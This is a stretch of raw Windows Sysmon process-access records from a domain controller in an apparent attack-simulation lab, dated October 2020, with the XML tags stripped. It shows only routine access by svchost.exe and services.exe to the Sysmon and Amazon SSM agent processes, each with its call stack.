10:40:10.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001446Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001445Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001444Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.304{733EE690-3DF7-5F80-0A00-000000007F01}8521120C:\Windows\system32\services.exe{733EE690-3E09-5F80-2C00-000000007F01}2760C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001443Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.255{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001442Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.255{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001441Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.255{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001440Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.254{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001439Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.254{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001438Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.254{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001437Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.254{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001436Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.254{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001435Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.254{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001434Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.246{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001433Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.246{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001432Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.246{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001431Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.246{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001430Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.246{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001429Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.246{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001428Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.246{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001427Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.246{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001426Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.246{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001425Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001424Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.243{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001423Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 